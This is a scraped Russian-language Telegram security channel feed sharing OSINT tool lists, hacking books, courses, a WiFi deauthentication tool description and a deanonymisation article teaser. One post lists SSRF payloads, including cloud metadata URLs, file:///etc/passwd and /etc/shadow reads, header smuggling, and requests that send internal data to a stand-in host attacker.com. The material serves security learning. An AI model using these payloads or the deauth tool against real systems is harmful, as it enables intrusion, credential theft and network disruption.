Архив Безопасника
10.9K subscribers
616 photos
69 videos
356 files
669 links
Материалы по хакингу и информационной безопасности со всего интернета.

Сотрудничество: @workhouse_price

РКН: https://clck.ru/3MENGA
Download Telegram
Forwarded from Social Engineering
📚 Коллекция книг для ИБ специалистов.

• В нашем втором канале проходит небольшой розыгрыш, где победители смогут получить коллекцию актуальных и полезных книг для ИБ специалистов:

- Сети глазами хакера;
- Контролируемый взлом. Библия социальной инженерии;
- Хакерство. Секреты мастерства;
- Тестирование на проникновение с Kali Linux;
- Хакерство. Физические атаки с использованием хакерских устройств.

• Каждый победитель получит сразу весь пул книг в бумажном варианте, которые перечислены выше. Принять участие можно тут: https://t.me/it_secur/2235

S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍93🔥2
👀 15 лучших OSINT-инструментов для сбора данных и анализа угроз

OSINT Framework веб-инструмент, который структурирует ссылки на ресурсы OSINT по категориям, таким как соцсети, анализ доменов и IP. Очень полезен для быстрой навигации и выбора нужных инструментов.
Google Dorks инструмент использует специальные поисковые операторы Google для поиска информации, которая не отображается при обычном поиске. Google Dorks помогает находить уязвимости, скрытые файлы и конфиденциальные данные на сайтах.
theHarvester инструмент используется для сбора данных об email, субдоменах, IP-адресах, доменах и открытых портах. Он полезен для начальных этапов проникновения и сбора разведданных о компаниях или веб-ресурсах.
SecurityTrails предоставляет доступ к данным о DNS, WHOIS, истории доменов и IP-адресов, что делает его полезным для мониторинга доменных записей и анализа сетевых угроз.
BGPViewэтот инструмент отслеживает маршруты BGP (граничный шлюзовый протокол), что помогает анализировать сетевые маршруты, отслеживать изменения в маршрутизации и выявлять потенциальные угрозы.
Recorded Future's Vulnerability Database Этот инструмент предоставляет базу данных уязвимостей (CVE), что помогает специалистам по безопасности быть в курсе последних угроз и уязвимостей.
Triage Malware Sandbox Платформа для анализа вредоносного ПО, которая позволяет безопасно тестировать и выявлять поведение вредоносных файлов в песочнице, помогая анализировать угрозы.
Mitaka Расширение для браузера, которое помогает анализировать домены, IP-адреса и хэши прямо из браузера. Оно интегрирует множество OSINT-источников для быстрого сбора данных.
Recorded Future Browser Extension Расширение для браузера от Recorded Future помогает собирать разведданные об угрозах прямо во время просмотра веб-сайтов, что ускоряет процесс анализа угроз и угроз безопасности.
Have I Been Pwned? Сайт, который позволяет пользователям проверить, были ли их учетные данные скомпрометированы в утечках данных. Он предоставляет информацию о том, были ли украдены email-адреса или пароли.
BuiltWith Этот инструмент анализирует веб-сайты и определяет, какие технологии используются, такие как серверное ПО, CMS и аналитические инструменты. Полезен для анализа конкурентов и изучения технической инфраструктуры сайтов.
Shodan это поисковая система, предназначенная для поиска устройств, подключенных к интернету (IoT, камеры, серверы и т.д.), и выявления уязвимостей в этих устройствах.
SpiderFoot это автоматизированный инструмент для сбора OSINT, который использует более 100 различных источников данных для анализа IP-адресов, доменов и электронной почты.
Maltego это инструмент для визуализации и анализа данных, который помогает выявлять взаимосвязи между различными объектами, такими как домены, IP и люди. Инструмент особенно полезен для проведения комплексных расследований.
Nmap один из самых популярных сетевых сканеров, который используется для сканирования сетей и портов. Его интеграция с OSINT помогает собирать данные о сетевой инфраструктуре и выявлять уязвимости.

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍5
Android глазами хакера.pdf
21.5 MB
📱 Android глазами хакера, 2-е издание

Рассмотрена внутренняя архитектура ОС Android, используемые ею разделы и файловые системы, принцип работы механизмов обновления и внутренних инструментов безопасности

Рассказано о разграничении доступа в ОС Android, о привилегиях, методах получения прав root, кастомизации и установке нестандартных прошивок

📝 Описаны инструменты для дизассемблирования, отладки и анализа кода мобильных приложений, приведены примеры модификации кода с целью изменения функций ПО и внедрения в приложение сторонних модулей

Даны подробные рекомендации по деобфускации кода и обходу антиотладки, а также практические советы по защите собственных приложений от декомпиляции и исследования

🦠 Приводятся сведения о вредоносных программах для платформы Android, используемых ими уязвимостях, даны примеры кода таких программ

Рассказывается об использовании стандартных функций Android в нестандартных целях и способах противодействия вредоносному ПО

Автор: Е. Зобнин
Год выхода: 2024

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥163🤯2👎1
🧰 Лучшие инструменты для проверки безопасности SSL TLS

Содержание статьи
Уязвимости в реализации и настройках протоколов SSL/TLS
Лучшие инструменты для проверки безопасности SSL/TLS
— Проверка безопасности SSL/TLS с Testssl.sh
— Проверка безопасности SSL/TLS с Sslscan
— Проверка безопасности SSL/TLS с Nmap
— Проверка безопасности SSL/TLS с SSLyze
— Поиск уязвимостей SSL/TLS  онлайн с HostedScan

В статье рассмотрим лучшие инструменты, которые помогут проверить безопасность SSL/TLS соединений и выявить потенциальные уязвимости

SSL (secure sockets layer – уровень защищённых cокетов) – это криптографический протокол для безопасной связи

TLS (Transport Layer Security) – криптографический протокол, который обеспечивает безопасную передачу данных на транспортном уровне

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
8🔥4👏2
❗️ Инструмент для проведения атак на WiFi

Wifi-deauth – это инструмент DDoS атаки deauth на WiFi сети, который отключает все устройства от целевой сети Wi-Fi (2,4 ГГц и 5 ГГц)

После того, как злоумышленник выбирает целевую точку доступа для атаки, программа:
Постоянно отправляет поддельные пакеты аутентификации с использованием адреса широковещательного mac в качестве пункта назначения
Начинает нюхать клиентов, подключенных к точки доступа, фильтруя определенные фреймы пакетов 802.11 и отправляя поддельные пакеты деаутентифиции этим клиентам в дополнение к адресу широковещания

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13👍93
👀 OSINT: Поиск по интернету вещей, IP, доменам и поддоменам

Shodan – знаменитая поисковая система для сбора информации об устройствах, подключенных к интернету.
Censys Search, GreyNoise, ZoomEye, Netlas, CriminalIp – аналогичные Shodan поисковые системы, ориентированные на IoT.
Buckets by Grayhatwarfar – база данных с общедоступным поиском по открытым AWS Buckets, Azure Blobs, Digital Ocean Spaces.
Public buckets – поиск общедоступных бакетам AWS S3 & Azure Blob.
macaddress.io, MAC Vendor Lookup, maclookup.app –определяют производителя устройства по MAC-адресу, OUI или IAB.

🔥 – если хотите больше таких подборок

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥422
C# глазами хакера.zip
14.1 MB
👁 C# глазами хакера

Подробно рассмотрены все аспекты безопасности от теории до реальных реализаций .NET-приложений на языке C#


Перечислены уязвимости, которые могут быть присущи веб-сайтам и Web API, описано, как хакеры могут эксплуатировать уязвимости и как можно обеспечить безопасность приложений

Рассмотрены сетевые функции: проверка соединения, отслеживание запроса, доступ к микросервисам, работа с сокетами и др.

Приведены реальные примеры атак хакеров и способы защиты от них

Автор: Фленов М.
Год выхода: 2022

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍4😈1
Основы_криптографии_и_подстановочные_шифры_zip.003
1.4 GB
📖 Криптография и шифры: основы

В курсе вы научитесь:
Основным подходам, методам и алгоритмам современной криптографии.
Некоторым криптографическим шифровальным системам, основанным на подстановке символов открытого алфавита для получения шифроалфавита.
Узнаете про самые первые шифры, появляющиеся на протяжении всей истории человечества.
Основным криптографическим шифрам подстановки и принципам их построения и сможете применять распространенные криптографические шифры на практике.

Удаляете и открываете как zip; 002 и другие оставляете в той же папке что и тот что открываете

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍3🦄1
List of Ransomware HD.png
643.5 KB
📄 Шпаргалка по Ransomware

Ransomware (вирус-шифровальщик, вирус-вымогатель)
– это вредоносная программа, которая при попадании на компьютер атакует важнейшие системные разделы с документами, таблицами, изображениями и пр.

Затем вирус шифрует все файлы этого типа и лишает владельца доступа к ним

Злоумышленники предлагают жертве заплатить деньги за восстановление доступа к данным

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍42👾1
😈 5 часто используемых SSRF нагрузок

SSRF (Server-Side Request Forgery)
– это уязвимость веб-приложения, которая позволяет злоумышленнику отправлять поддельные запросы от имени самого сервера

Пейлоады SSRF представляют собой специально сформированные запросы, которые злоумышленник внедряет в уязвимое веб-приложение


SSRF пейлоады могут включать
манипуляции с URL-адресами, использование специальных схем (например, file://, ftp://), эксплойты протокольного smuggling, обращения к метаданным облачных провайдеров и другие техники для достижения своих целей

1. Сканирование внутренней сети
Получение метаданных с инстансов AWS EC2:
http://169.254.169.254/latest/meta-data/

Получение метаданных с инстансов Google Cloud:
http://metadata.google.internal/computeMetadata/v1/instance/

Получение метаданных с инстансов Azure:
http://169.254.169.254/metadata/v1/

2. Получение файлов
Получение содержимого файла /etc/passwd:
file:///etc/passwd

Получение содержимого файла /etc/shadow (если доступно):
file:///etc/shadow

Получение содержимого файла boot.ini (Windows):
file:///c:/boot.ini


3. Взаимодействие с внешними сервисами
Получение содержимого внутреннего сайта и отправка его на сервер злоумышленника:
http://attacker.com/?url=http://internal.site.com/

Попытка подключиться к FTP-серверу, управляемому злоумышленником:
ftp://attacker.com/


4. Протокольный smuggling
Использование протокольного smuggling для изменения заголовка Host:
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a

Добавление фрагмента URL для обмана сервера, чтобы он подумал, что запрос предназначен для attacker.com:
http://internal.site.com:80%23attacker.com


5. Эксфильтрация данных через DNS
Использование DNS-запроса для передачи данных на сервер, контролируемый злоумышленником:
http://attacker.com/?url=http://x.x.x.x/

Использование поддомена для эксфильтрации данных на сервер злоумышленника:
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/


👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥53
Криптографические_методы_защиты_информации.pdf
9.5 MB
🔒 Криптографические методы защиты информации

В настоящем пособии рассмотрены только основные математические методы защиты информации, и среди них главный акцент сделан на криптографическую защиту, которая включает:
симметричные и несимметричные методы шифрования
формирование секретных ключей
протоколы ограничения доступа и аутентификации сообщений и пользователей

Кроме того, в пособии рассматриваются типовые уязвимости операционных и информационно вычислительных систем

Авторы: Владимиров С. М.
Габидулин Э. М.
Колыбельников А. И.
Кшевецкий А. С.
Год выхода: 2020

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍162🦄2
🥷 Инструменты для деанонимизации: обзор программного обеспечения и методик

В статье автор поделиться своим опытом и знаниями о том, как можно раскрыть личность человека в интернете, используя различные техники и программы

Деанонимизация – это процесс, при котором анонимный пользователь или группа пользователей становятся известными по своим реальным данным, таким как имя, адрес, номер телефона, электронная почта и т.д.


Существует множество инструментов и методик для деанонимизации, которые можно разделить на несколько категорий:
Анализ данных
Анализ социальных сетей
Анализ текста
Анализ изображений

В статье подробно рассмотрим каждую из категорий

👀 Источник

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥5
Часть 6.zip
1.8 GB
📺 Курс: Тестирование на проникновение сайта

Комплексный курс по взлому веб-сайтов и веб-приложений от Зайда Сабиха, в русской озвучке! Материал подойдёт как для специалистов, так и для начинающих, которые лишь начинают свой путь в тестировании на проникновение и хакинге.

Secure Books
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍7